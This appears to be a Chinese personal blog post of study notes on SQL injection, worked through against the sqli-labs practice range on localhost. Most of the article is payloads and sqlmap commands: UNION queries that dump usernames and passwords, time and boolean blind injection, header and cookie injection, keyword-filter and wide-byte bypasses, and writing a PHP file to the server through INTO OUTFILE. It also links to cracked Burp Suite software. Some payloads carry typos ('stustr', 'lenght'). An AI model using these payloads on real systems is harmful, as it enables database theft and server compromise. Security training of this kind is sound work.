<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  
  <title>sql注入 | 0冻的盒子</title>
  
  

  

  <meta name="HandheldFriendly" content="True">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <!-- meta -->
  

  <!-- link -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/node-waves@0.7.6/dist/waves.min.css">
  
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.6.3/css/all.min.css">
  

  
  <link rel="shortcut icon" type="image/x-icon" href="https://cdn.jsdelivr.net/lacc233/lacc233.github.io@v1.0/icon/redbox.png">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/xaoxuu/cdn-material-x@19.5/css/style.css">
  

  <script>
    function setLoadingBarProgress(num) {
      document.getElementById('loading-bar').style.width=num+"%";
    }
  </script>

  
  
</head>

<body>
  
  
  <header class="l_header pure">
  <div id="loading-bar-wrapper">
    <div id="loading-bar" class="pure"></div>
  </div>

	<div class='wrapper'>
		<div class="nav-main container container--flex">
      <a class="logo flat-box" href='/' >
        
          0冻的盒子
        
      </a>
			<div class='menu navgation'>
				<ul class='h-list'>
          
  					
  						<li>
								<a class="nav flat-box" href="/"
                  
                  
                  id="home">
									<i class='fas fa-grin fa-fw'></i>&nbsp;示例
								</a>
							</li>
      			
  						<li>
								<a class="nav flat-box" href="/categories/"
                  
                    rel="nofollow"
                  
                  
                  id="categories">
									<i class='fas fa-folder-open fa-fw'></i>&nbsp;分类
								</a>
							</li>
      			
  						<li>
								<a class="nav flat-box" href="/tags/"
                  
                    rel="nofollow"
                  
                  
                  id="tags">
									<i class='fas fa-hashtag fa-fw'></i>&nbsp;标签
								</a>
							</li>
      			
  						<li>
								<a class="nav flat-box" href="/archives/"
                  
                    rel="nofollow"
                  
                  
                  id="archives">
									<i class='fas fa-archive fa-fw'></i>&nbsp;归档
								</a>
							</li>
      			
      		
				</ul>
			</div>

			
				<div class="m_search">
					<form name="searchform" class="form u-search-form">
						<input type="text" class="input u-search-input" placeholder="搜索" />
						<i class="icon fas fa-search fa-fw"></i>
					</form>
				</div>
			
			<ul class='switcher h-list'>
				
					<li class='s-search'><a class="fas fa-search fa-fw" href='javascript:void(0)'></a></li>
				
				<li class='s-menu'><a class="fas fa-bars fa-fw" href='javascript:void(0)'></a></li>
			</ul>
		</div>

		<div class='nav-sub container container--flex'>
			<a class="logo flat-box"></a>
			<ul class='switcher h-list'>
				<li class='s-comment'><a class="flat-btn fas fa-comments fa-fw" href='javascript:void(0)'></a></li>
        
          <li class='s-toc'><a class="flat-btn fas fa-list fa-fw" href='javascript:void(0)'></a></li>
        
			</ul>
		</div>
	</div>
</header>
	<aside class="menu-phone">
    <header>
		<nav class="menu navgation">
      <ul>
        
          
            <li>
							<a class="nav flat-box" href="/"
                
                
                id="home">
								<i class='fas fa-clock fa-fw'></i>&nbsp;近期文章
							</a>
            </li>
          
            <li>
							<a class="nav flat-box" href="/archives/"
                
                  rel="nofollow"
                
                
                id="archives">
								<i class='fas fa-archive fa-fw'></i>&nbsp;文章归档
							</a>
            </li>
          
            <li>
							<a class="nav flat-box" href="/projects/"
                
                
                id="projects">
								<i class='fas fa-code-branch fa-fw'></i>&nbsp;开源项目
							</a>
            </li>
          
            <li>
							<a class="nav flat-box" href="/friends/"
                
                  rel="nofollow"
                
                
                id="friends">
								<i class='fas fa-link fa-fw'></i>&nbsp;我的友链
							</a>
            </li>
          
            <li>
							<a class="nav flat-box" href="https://xaoxuu.com/wiki/material-x/"
                
                  rel="nofollow"
                
                
                id="https:xaoxuu.comwikimaterial-x">
								<i class='fas fa-book fa-fw'></i>&nbsp;主题文档
							</a>
            </li>
          
            <li>
							<a class="nav flat-box" href="/about/"
                
                  rel="nofollow"
                
                
                id="about">
								<i class='fas fa-info-circle fa-fw'></i>&nbsp;关于小站
							</a>
            </li>
          
       
      </ul>
		</nav>
    </header>
	</aside>
<script>setLoadingBarProgress(40);</script>



  <div class="l_body nocover">
    <div class='body-wrapper'>
      <div class='l_main'>
  

  
    <article id="post" class="post white-box article-type-post" itemscope itemprop="blogPost">
      


  <section class='meta'>
    
    
    <div class="meta" id="header-meta">
      
        
  
    <h1 class="title">
      <a href="/2019/06/02/sql注入/">
        sql注入
      </a>
    </h1>
  


      
      <div class='new-meta-box'>
        
          
        
          
            
  <div class='new-meta-item author'>
    <a href="https://cherwn.top" rel="nofollow">
      
        <i class="fas fa-user" aria-hidden="true"></i>
      
      <p>0冻</p>
    </a>
  </div>


          
        
          
            <div class="new-meta-item date">
  <a class='notlink'>
    <i class="fas fa-calendar-alt" aria-hidden="true"></i>
    <p>2019-06-02</p>
  </a>
</div>

          
        
          
            

          
        
          
            
  
    <div class="new-meta-item browse busuanzi">
      <a class='notlink'>
        <i class="fas fa-eye" aria-hidden="true"></i>
        <p>
          <span id="busuanzi_value_page_pv">
            <i class="fas fa-spinner fa-spin fa-fw" aria-hidden="true"></i>
          </span>
        </p>
      </a>
    </div>
  


          
        
          
            

          
        
      </div>
      
        <hr>
      
    </div>
  </section>


      <section class="article typo">
        <div class="article-entry" itemprop="articleBody">
          <p>搭建sql注入靶场：<br>工具：phpstudy , sqli , sqlmap , 浏览器</p>
<a id="more"></a>

<h2 id="sql注入："><a href="#sql注入：" class="headerlink" title="sql注入："></a>sql注入：</h2><p>sql语言是解释型语言，就是源代码解释（需要解释器）成机器码直接执行</p>
<p>sql注入原理：利用站点设计漏洞，在web表单的输入域或页面请求的字符串，注入不同意图的sql语句，来获得信息。（注入原理：用户输入，用户可控，修改并带入sql语句，然后执行）</p>
<p>目的： 获取关键信息，例如账号密码，数据库表内存储数据。</p>
<p>方式：手工，工具</p>
<p>burpsuite工具链接：<a href="https://pan.baidu.com/s/1pCEyXH5mkD2RojXk7DvXdA" target="_blank" rel="noopener">https://pan.baidu.com/s/1pCEyXH5mkD2RojXk7DvXdA</a><br>提取码：1mbb<br>复制这段内容后打开百度网盘手机App，操作更方便哦</p>
<p><a href="https://www.cnblogs.com/tynam/p/10089111.html" target="_blank" rel="noopener">破解参考博客</a></p>
<p><a href="https://www.cnblogs.com/nieliangcai/p/6689915.html" target="_blank" rel="noopener">burpsuite使用参考博客</a></p>
<h3 id="get基于报错的注入"><a href="#get基于报错的注入" class="headerlink" title="get基于报错的注入"></a>get基于报错的注入</h3><p><strong>Less-1:</strong><br>‘’1’’ LIMIT 0,1’<br>‘1’’ LIMIT 0,1<br>sql: select password,a from admain where id=’’ LIMIT 0,1</p>
<p><code>手工注入：</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1/sqli/Less-1/?id=1' order by 3  --+ ✔判断字段数</span><br><span class="line">联合查询：</span><br><span class="line">127.0.0.1/sqli/Less-1/?id=0' UNION SELECT 1,user(),database() --+✔</span><br><span class="line"></span><br><span class="line">127.0.0.1/sqli/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ #✔获取表名</span><br><span class="line"></span><br><span class="line">127.0.0.1/sqli/Less-1/?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ #✔获取字段名</span><br><span class="line"></span><br><span class="line">127.0.0.1/sqli/Less-1/?id=0' union select 1,group_concat(username,0x3a,password),3 from users--+ #✔获取字段值</span><br></pre></td></tr></table></figure>

<blockquote>
<p>解读： 0x3a为 ”:“</p>
</blockquote>
<p><code>sqlmap:</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --dbs --batch</span><br><span class="line">sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security --tables --batch</span><br><span class="line">sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users --columns --batch</span><br><span class="line"><span class="meta">#</span><span class="bash">下面(<span class="string">''</span>是错的，要用<span class="string">""</span>或无引号，如下)</span></span><br><span class="line">sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users -C "password,username" --dump --batch</span><br><span class="line">sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users -C password,username --dump --batch</span><br></pre></td></tr></table></figure>

<p><strong>Less-2:</strong><br>‘’ LIMIT 0,1’<br>‘ LIMIT 0,1<br>sql: select * from admain where id=1 limit 0,1</p>
<p><strong>Less-3：</strong><br>‘’1&#39;) LIMIT 0,1’<br>‘1&#39;) LIMIT 0,1<br>sql: select * from admain where id = (‘1’) limit 0,1</p>
<p><strong>Less-4:</strong><br>‘“1&quot;) LIMIT 0,1’<br>“1&quot;) LIMIT 0,1<br>sql: select * from  admain where id=(“1”) limit 0,1</p>
<h3 id="get盲注："><a href="#get盲注：" class="headerlink" title="get盲注："></a>get盲注：</h3><h4 id="基于时间的盲注："><a href="#基于时间的盲注：" class="headerlink" title="基于时间的盲注："></a>基于时间的盲注：</h4><p><strong>Less-9:</strong></p>
<p>127.0.0.1/sqli/Less-9/?id=1” and if(ascii(stustr(database(),1,1))=115,1,sleep(3)) –+</p>
<p><strong>Less-10:</strong></p>
<p>127.0.0.1/sqli/Less-10/?id=1” and if(ascii(stustr(database(),1,1))=115,1,sleep(3)) –+</p>
<h4 id="基于boolean的盲注："><a href="#基于boolean的盲注：" class="headerlink" title="基于boolean的盲注："></a>基于boolean的盲注：</h4><p><strong>less-8</strong>:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1/sqli/Less-8/?id=1' and length(database())=8 --+</span><br><span class="line"><span class="meta">#</span><span class="bash">可接在 and 后</span></span><br><span class="line">stustr(database(),1,1)</span><br><span class="line">asciii(stustr(database(),1,1))=N</span><br></pre></td></tr></table></figure>

<p><code>sqlmap:</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u "注入点" --technique T --dbs</span><br></pre></td></tr></table></figure>

<blockquote>
<p>注解： T 基于时间 （sqlmap -h/hh 查询详细）</p>
<p>Techniques:<br> These options can be used to tweak testing of specific SQL     injection<br> techniques</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;</span><span class="bash"> --technique=TECH    SQL injection techniques to use (default <span class="string">"BEUSTQ"</span>)</span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash"></span></span><br></pre></td></tr></table></figure>
</blockquote>
<blockquote>
<p>B: Boolean-based blind SQL injection（布尔型注入）<br>E: Error-based SQL injection（报错型注入）<br>U: UNION query SQL injection（可联合查询注入）<br>S: Stacked queries SQL injection（可多语句查询注入）<br>T: Time-based blind SQL injection（基于时间延迟注入）</p>
<p>默认情况下会测试所有的方式，可选择</p>
</blockquote>
<h3 id="mysql读写文件："><a href="#mysql读写文件：" class="headerlink" title="mysql读写文件："></a>mysql读写文件：</h3><p>读：</p>
<blockquote>
<p>前提：show global variables like “secure_file_priv”;</p>
<p><img src="%5Cimages%5Cmysqld_secure_file_priv.png" alt></p>
<p>修改my.ini </p>
<p><img src="%5Cimages%5Cnull.png" alt></p>
<p><img src="%5Cimages%5Cnull_no.png" alt></p>
<p>重启phpstudy.</p>
<p>select load_file(“f:\1.txt”)；</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union select 1,load_file(f:www\\Less-7\\flag.txt),3 --+</span><br></pre></td></tr></table></figure>

<p>写：</p>
<blockquote>
<p>前提：show variables like ‘%general%’;</p>
<p><img src="%5Cimages%5Cwrite-1.png" alt></p>
<p>查看其general_log 是否为 OFF。</p>
<p>若是，则修改为 on 。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; set global general_log = on;</span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<blockquote>
<p><img src="%5Cimages%5Cwrite_yes.png" alt></p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">union select 1,&apos;&lt;?php phpinfo();?&gt;&apos;,3 into outfile &quot;f:www\\Less-7\\1.php&quot; --+</span><br><span class="line"></span><br><span class="line">127.0.0.1\Less-7\1.php #查看是否写入成功</span><br></pre></td></tr></table></figure>

<p><code>sqlmap:</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -hh</span><br><span class="line">sqlmap -u "注入点" --file-read "文件路经"</span><br><span class="line">				 --file-write</span><br><span class="line">				 --file-dest</span><br></pre></td></tr></table></figure>

<h3 id="post-基于报错"><a href="#post-基于报错" class="headerlink" title="post 基于报错"></a>post 基于报错</h3><blockquote>
<p>get与post的区别:注入点发生改变，post 无法在浏览器中查看与修改，但是可以用插件。</p>
</blockquote>
<p><code>burpsuite</code></p>
<p>burpsuite 抓取http数据包保存在文件中</p>
<p><code>sqlmap</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -r 文件路径 -p 指定探测参数</span><br></pre></td></tr></table></figure>

<h3 id="get报错注入-未完善"><a href="#get报错注入-未完善" class="headerlink" title="get报错注入(未完善)"></a>get报错注入(未完善)</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">count</span>(*) <span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>)</span><br></pre></td></tr></table></figure>

<blockquote>
<p>注解： 011011</p>
</blockquote>
<h3 id="sql注入绕过"><a href="#sql注入绕过" class="headerlink" title="sql注入绕过"></a>sql注入绕过</h3><p>大小写，编码，关键字屏蔽，内联注释</p>
<h3 id="post-基于时间和布尔值的盲注"><a href="#post-基于时间和布尔值的盲注" class="headerlink" title="post 基于时间和布尔值的盲注"></a>post 基于时间和布尔值的盲注</h3><p><code>burpsuite</code>抓取http报文</p>
<p>时间：… and (select (if (lenght (datebase() )&gt; 5,sleep(5),null))) –+ </p>
<p>布尔：… and (lenght (database() )&gt;5) –+</p>
<p><code>sqlmap</code> </p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">时间 ： sqlmap -r "文件路径" -p  参数   --technique T </span><br><span class="line">布尔：   sqlmap -r "文件路径" -p  参数   --technique B</span><br></pre></td></tr></table></figure>

<h3 id="http头中的注入"><a href="#http头中的注入" class="headerlink" title="http头中的注入"></a>http头中的注入</h3><p>在user-agent 和 referer 未被屏蔽时，可以进行注入</p>
<p><code>burpsuite</code></p>
<p>user-agent: </p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">' and updatexml(1,concat(0x7e,version(),0x7e),1) or '1'='1</span><br></pre></td></tr></table></figure>

<p>referer:</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">' or (length(datebase())&gt;8) or if (1=1,sleep(5),null) or '1'='1</span><br></pre></td></tr></table></figure>

<h3 id="post-update语句的注入"><a href="#post-update语句的注入" class="headerlink" title="post_update语句的注入"></a>post_update语句的注入</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">updatexml(1,concat(0x7e,version(),0x7e),1)</span><br></pre></td></tr></table></figure>

<blockquote>
<p>注解： 1报错，执行”concat(0x7e,version(),0x7e)”做sql语句，替换报错内容，在报错中执行，最后输出。</p>
</blockquote>
<p>updatexml和extractvalue函数</p>
<h3 id="cookie注入"><a href="#cookie注入" class="headerlink" title="cookie注入"></a>cookie注入</h3><p>例：less-20</p>
<p><code>burpsuite</code></p>
<p>抓取，用” \ “判断闭合符号，之后 and 1=1,或 and \ or 加sql语句</p>
<p><code>sqlmap</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -r "target.txt" --level 3 --batch </span><br><span class="line">sqlmap.py -r "target.txt" --level 3 --batch --dbs</span><br><span class="line">sqlmap.py -r "target.txt" --level 3 --batch -D security --tables</span><br><span class="line">sqlmap.py -r "target.txt" --level 3 --batch -D security -T users --columns </span><br><span class="line">sqlmap.py -r "target.txt" --level 3 --batch -D security -T users -C password,username --dump</span><br></pre></td></tr></table></figure>

<h3 id="base64注入"><a href="#base64注入" class="headerlink" title="base64注入"></a>base64注入</h3><p><code>burpsuite</code></p>
<p>首先截取，decoder 进行加密，例如：admin\ base64加密后为：YWRtaW5c</p>
<p>进行报错。</p>
<p><code>sqlmap</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -r "target.txt" --level 3 --batch --tamper base64encode.py</span><br></pre></td></tr></table></figure>

<h3 id="绕过去除注释的sql注入"><a href="#绕过去除注释的sql注入" class="headerlink" title="绕过去除注释的sql注入"></a>绕过去除注释的sql注入</h3><p>注释符：  –+   –空格    #   /* 多行注释 */</p>
<p>preg_replace()函数来替换字符串或字符数组的莫些字符</p>
<p>例：less-23:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1' union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">database</span>(),<span class="string">'3</span></span><br></pre></td></tr></table></figure>

<p> 注解：-1使前面的失效，union select 语句有效，-1和3旁边的单引号为一对，自动补充的单引号会加在最后，最后完成闭合。</p>
<p><code>sqlmap</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://127.0.0.1/sqli/Less-23/?id=1" --batch --dbs</span><br></pre></td></tr></table></figure>

<p>…</p>
<h3 id="绕过去除and-or-的sql注入"><a href="#绕过去除and-or-的sql注入" class="headerlink" title="绕过去除and or 的sql注入"></a>绕过去除and or 的sql注入</h3><p>preg_replace()函数来替换字符串或字符数组的莫些字符</p>
<p>双写，内含注释，符号 （例：oorr,an/**/d,&amp;&amp;,||)</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://127.0.0.1/sqli/Less-25/?id=1" --batch --dbs</span><br></pre></td></tr></table></figure>

<h3 id="绕过去除空格的sql注入"><a href="#绕过去除空格的sql注入" class="headerlink" title="绕过去除空格的sql注入"></a>绕过去除空格的sql注入</h3><p>%09 :Tab </p>
<p>%0a ：换行</p>
<p>%20 ：空格 </p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-27/?id=100000000%27%09unIOn%09seLEct%091,version(),3%09||%09%271</span><br></pre></td></tr></table></figure>

<p><code>sqlmap</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://127.0.0.1/sqli/Less-27/?id=1" --batch --dbs</span><br></pre></td></tr></table></figure>

<h3 id="宽字节的注入"><a href="#宽字节的注入" class="headerlink" title="宽字节的注入"></a>宽字节的注入</h3><p>原理： GBK ：宽字节字符集的一种，Mysql默认字符集,</p>
<p>GBK占二字节，ASCII占一字节</p>
<p>php中编码为GBK，函数执行添加的是ASCII编码</p>
<p>%DF (常用)：会被php 中的addslashes 函数转义为” %DF\‘ “ ， 如果网站，mysql编码都为GBK，那么就会被转义为”%DF%5C%27”，”%DF%5C”其为一个宽字符，也就是“縗”。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-33/?id=-1%df%27%20union%20select%201,version(),database()--+</span><br></pre></td></tr></table></figure>

<p><code>sqlmap</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://127.0.0.1/sqli/Less-33/?id=1%df%27" --search --level 3 --risk 1 --thread 10</span><br></pre></td></tr></table></figure>

<p>其实，首字节ascii大于128，如129十进制转十六进制为0x81,然后写%81即可；</p>
<p>GBK 首字节对应(0x81-0xFE),尾字节对应 0x40-0xFE (0x7F除外)。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-32/?id=-1%81%27%20%20union%20select%201,2,3--+</span><br></pre></td></tr></table></figure>

<p><code>sqlmap</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://127.0.0.1/sqli/Less-32/?id=1" --tamper=unmagicquotes.py</span><br></pre></td></tr></table></figure>

<h3 id="Access偏移注入"><a href="#Access偏移注入" class="headerlink" title="Access偏移注入"></a>Access偏移注入</h3><p>公式：</p>
<p>工具：owasp-zap</p>
<p>access:小型数据库，只存在一个库，库内多个表。</p>

        </div>
        
          


  <section class='meta' id="footer-meta">
    <hr>
    <div class='new-meta-box'>
      
        
          <div class="new-meta-item date" itemprop="dateUpdated" datetime="2019-06-14T20:58:35+08:00">
  <a class='notlink'>
    <i class="fas fa-clock" aria-hidden="true"></i>
    <p>最后更新于 2019年6月14日</p>
  </a>
</div>

        
      
        
          
  
  <div class="new-meta-item meta-tags"><a class="tag" href="/tags/sql注入/" rel="nofollow"><i class="fas fa-hashtag" aria-hidden="true"></i>&nbsp;<p>sql注入</p></a></div>


        
      
        
          

        
      
    </div>
  </section>


        
        
            <div class="prev-next">
                
                    <section class="prev">
                        <span class="art-item-left">
                            <h6><i class="fas fa-chevron-left" aria-hidden="true"></i>&nbsp;上一页</h6>
                            <h4>
                                <a href="/2019/07/04/sqlmap详细使用教程/" rel="prev" title="sqlmap详细使用教程">
                                  
                                      sqlmap详细使用教程
                                  
                                </a>
                            </h4>
                            
                                
                                <h6 class="tags">
                                    <a class="tag" href="/tags/sqlmap/"><i class="fas fa-hashtag fa-fw" aria-hidden="true"></i>sqlmap</a>
                                </h6>
                            
                        </span>
                    </section>
                
                
                    <section class="next">
                        <span class="art-item-right" aria-hidden="true">
                            <h6>下一页&nbsp;<i class="fas fa-chevron-right" aria-hidden="true"></i></h6>
                            <h4>
                                <a href="/2019/05/13/搭建ss服务/" rel="prev" title="搭建ss服务">
                                    
                                        搭建ss服务
                                    
                                </a>
                            </h4>
                            
                                
                                <h6 class="tags">
                                    <a class="tag" href="/tags/vps/"><i class="fas fa-hashtag fa-fw" aria-hidden="true"></i>vps</a> <a class="tag" href="/tags/ss/"><i class="fas fa-hashtag fa-fw" aria-hidden="true"></i>ss</a>
                                </h6>
                            
                        </span>
                    </section>
                
            </div>
        
      </section>
    </article>
  

  
    <!-- 显示推荐文章和评论 -->



  <article class="post white-box comments">
    <section class="article typo">
      <h4><i class="fas fa-comments fa-fw" aria-hidden="true"></i>&nbsp;评论</h4>
      
      
      
      
        <section id="comments">
          <div id="valine_container" class="valine_thread">
            <i class="fas fa-spinner fa-spin fa-fw"></i>
          </div>
        </section>
      
    </section>
  </article>


  




<!-- 根据页面mathjax变量决定是否加载MathJax数学公式js -->



  <script>
    window.subData = {
      title: 'sql注入',
      tools: true
    }
  </script>


</div>
<aside class='l_side'>
  
    
    
      
        
          
          
            <section class='widget author'>
  <div class='content pure'>
    
      <div class='avatar'>
        <img class='avatar' src='https://cdn.jsdelivr.net/gh/lacc233/lacc233.github.io@v1.0/icon/favorite.jpg'/>
      </div>
    
    
    
      <div class="social-wrapper">
        
          
            <a href="/atom.xml"
              class="social fas fa-rss flat-btn"
              target="_blank"
              rel="external nofollow noopener noreferrer">
            </a>
          
        
          
            <a href="https://weibo.com/u/6174928918"
              class="social fab fa-weibo flat-btn"
              target="_blank"
              rel="external nofollow noopener noreferrer">
            </a>
          
        
          
            <a href="https://github.com/lacc233"
              class="social fab fa-github flat-btn"
              target="_blank"
              rel="external nofollow noopener noreferrer">
            </a>
          
        
          
            <a href="https://music.163.com/#/user/home?id=1372862909"
              class="social fas fa-headphones-alt flat-btn"
              target="_blank"
              rel="external nofollow noopener noreferrer">
            </a>
          
        
      </div>
    
  </div>
</section>

          
        
      
        
          
          
            <section class='widget grid'>
  
<header class='pure'>
  <div><i class="fas fa-map-signs fa-fw" aria-hidden="true"></i>&nbsp;&nbsp;站内导航</div>
  
</header>

  <div class='content pure'>
    <ul class="grid navgation">
      
        <li><a class="flat-box" title="/" href="/"
          
          
          id="home">
          
            <i class="fas fa-clock fa-fw" aria-hidden="true"></i>
          
          近期文章
        </a></li>
      
        <li><a class="flat-box" title="/archives/" href="/archives/"
          
            rel="nofollow"
          
          
          id="archives">
          
            <i class="fas fa-archive fa-fw" aria-hidden="true"></i>
          
          文章归档
        </a></li>
      
        <li><a class="flat-box" title="/projects/" href="/projects/"
          
          
          id="projects">
          
            <i class="fas fa-code-branch fa-fw" aria-hidden="true"></i>
          
          开源项目
        </a></li>
      
        <li><a class="flat-box" title="/friends/" href="/friends/"
          
            rel="nofollow"
          
          
          id="friends">
          
            <i class="fas fa-link fa-fw" aria-hidden="true"></i>
          
          我的友链
        </a></li>
      
        <li><a class="flat-box" title="https://xaoxuu.com/wiki/material-x/" href="https://xaoxuu.com/wiki/material-x/"
          
            rel="nofollow"
          
          
          id="https:xaoxuu.comwikimaterial-x">
          
            <i class="fas fa-book fa-fw" aria-hidden="true"></i>
          
          主题文档
        </a></li>
      
        <li><a class="flat-box" title="/about/" href="/about/"
          
            rel="nofollow"
          
          
          id="about">
          
            <i class="fas fa-info-circle fa-fw" aria-hidden="true"></i>
          
          关于小站
        </a></li>
      
    </ul>
  </div>
</section>

          
        
      
        
          
          
            
  <section class='widget tagcloud'>
    
<header class='pure'>
  <div><i class="fas fa-fire fa-fw" aria-hidden="true"></i>&nbsp;&nbsp;热门标签</div>
  
    <a class="rightBtn"
    
      rel="nofollow"
    
    
    href="/tags/"
    title="tags/">
    <i class="fas fa-expand-arrows-alt fa-fw"></i></a>
  
</header>

    <div class='content pure'>
      <a href="/tags/DOS命令/" style="font-size: 14px; color: #999">DOS命令</a> <a href="/tags/google/" style="font-size: 14px; color: #999">google</a> <a href="/tags/kali/" style="font-size: 20.67px; color: #6c6c6c">kali</a> <a href="/tags/linux/" style="font-size: 24px; color: #555">linux</a> <a href="/tags/mysql/" style="font-size: 14px; color: #999">mysql</a> <a href="/tags/python/" style="font-size: 17.33px; color: #828282">python</a> <a href="/tags/python脚本/" style="font-size: 14px; color: #999">python脚本</a> <a href="/tags/shell命令/" style="font-size: 14px; color: #999">shell命令</a> <a href="/tags/sqlmap/" style="font-size: 14px; color: #999">sqlmap</a> <a href="/tags/sql注入/" style="font-size: 14px; color: #999">sql注入</a> <a href="/tags/ss/" style="font-size: 14px; color: #999">ss</a> <a href="/tags/vps/" style="font-size: 14px; color: #999">vps</a> <a href="/tags/web安全/" style="font-size: 14px; color: #999">web安全</a> <a href="/tags/web服务/" style="font-size: 14px; color: #999">web服务</a> <a href="/tags/windoes/" style="font-size: 14px; color: #999">windoes</a> <a href="/tags/xss/" style="font-size: 14px; color: #999">xss</a> <a href="/tags/博客搭建/" style="font-size: 14px; color: #999">博客搭建</a> <a href="/tags/工具/" style="font-size: 14px; color: #999">工具</a> <a href="/tags/无线安全/" style="font-size: 14px; color: #999">无线安全</a>
    </div>
  </section>


          
        
      
        
          
          
            
  <section class='widget toc-wrapper'>
    
<header class='pure'>
  <div><i class="fas fa-list fa-fw" aria-hidden="true"></i>&nbsp;&nbsp;本文目录</div>
  
    <div class='wrapper'><a class="s-toc rightBtn" rel="external nofollow noopener noreferrer" href="javascript:void(0)"><i class="fas fa-thumbtack fa-fw"></i></a></div>
  
</header>

    <div class='content pure'>
